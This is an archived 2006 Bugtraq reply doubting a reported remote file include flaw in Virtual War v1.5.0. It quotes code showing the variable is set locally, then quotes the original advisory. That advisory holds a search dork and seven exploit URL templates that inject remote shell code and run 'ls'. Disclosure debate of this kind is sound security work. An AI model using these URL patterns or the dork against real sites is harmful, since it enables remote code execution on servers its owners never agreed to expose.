AW: Virtual War v1.5.0 Remote File Include (vwar_root)

To: "'AG Spider'" <ag-spider@xxxxxxxxxxx>, <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: AW: Virtual War v1.5.0 Remote File Include (vwar_root)
From: Frank Reißner <mail@xxxxxxxxxxxxxxxxx>
Date: Tue, 8 Aug 2006 14:54:53 +0200
In-reply-to: <BAY116-F283A06E115B2766A307260FD570@xxxxxxx>
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Thread-index: Aca6UdCCCA8zs1hRTkabtGWbUlqPmwAl6Uzw

How should that be exploitable?

$vwar_root is initialised with "./" in the first line of code after comment.


*snip*

<?php
/*
############################################################################
 *
 * $Id: war.php,v 1.191 2004/09/09 15:52:33 rob Exp $
 *
 * This notice must remain untouched at all times.
 *
 * Modifications to the script, except the official addons or hacks,
 * without the owners permission are prohibited.
 * All rights reserved to their proper authors.
 *
 * ---------------------------------------------
 * http://www.vwar.de || Copyright (C) 2001-2004
 * ---------------------------------------------
 *
 *
############################################################################
 */

// get functions
$vwar_root = "./";

require ($vwar_root . "includes/functions_common.php");
require ($vwar_root . "includes/functions_front.php");




-----Ursprüngliche Nachricht-----
Von: AG Spider [mailto:ag-spider@xxxxxxxxxxx] 
Gesendet: Montag, 7. August 2006 16:45
An: bugtraq@xxxxxxxxxxxxxxxxx
Betreff: Virtual War v1.5.0 Remote File Include (vwar_root)

Title : Virtual War v1.5.0 Remote File Include (vwar_root)

############################################

Discovered By :::: :::: ::::  AG-Spider :::: :::: ::::

----------------------------------------------------------------------------
-
Class           : Remote file include
Rish            : Danger
Application   : Virtual War v1.5.0
URL            : www.vwar.de


----------------------------------------------------------------------------
-

dork        : Powered by: Virtual War v1.5.0

Exploit    :    
http://www.$ite.com/[vwar_path]/war.php?vwar_root=[Shell-code]?&cmd=ls
                  
http://www.$ite.com/[vwar_path]/member.php?vwar_root=[Shell-code]?&cmd=ls
                  
http://www.$ite.com/[vwar_path]/calendar.php?vwar_root=[Shell-code]?&cmd=ls
                  
http://www.$ite.com/[vwar_path]/challenge.php?vwar_root=[Shell-code]?&cmd=ls
                  
http://www.$ite.com/[vwar_path]/joinus.php?vwar_root=[Shell-code]?&cmd=ls
                  
http://www.$ite.com/[vwar_path]news.php?vwar_root=[Shell-code]?&cmd=ls
                  
http://www.$ite.com/[vwar_path]/stats.php?vwar_root=[Shell-code]?&cmd=ls


----------------------------------------------------------------------------

The Arab Warriors Security Team
- - -[T-A-W-S-T] - - -
Muslims Hackers

greetz4: [ Black-Code  -  KILLERxXx - KaBaRa.HaCk .eGy - CrAsH_oVeR_rIdE]

c0natct us : AG-Spider [ at ] HoTMail.CoM
thx 2 :::::: Lezr.com & 3asfh.net

_________________________________________________________________
Download the new Windows Live Toolbar, including Desktop search! 
http://toolbar.live.com/?mkt=en-gb

References:
- Virtual War v1.5.0 Remote File Include (vwar_root)
  - From: AG Spider

Prev by Date: ERRATA: [ GLSA 200608-08 ] GnuPG: Integer overflow vulnerability
Next by Date: rPSA-2006-0150-1 krb5 krb5-server krb5-services krb5-test krb5-workstation
Previous by thread: Virtual War v1.5.0 Remote File Include (vwar_root)
Next by thread: [SECURITY] [DSA 1144-1] New chmlib packages fix denial of service
Index(es):
- Date
- Thread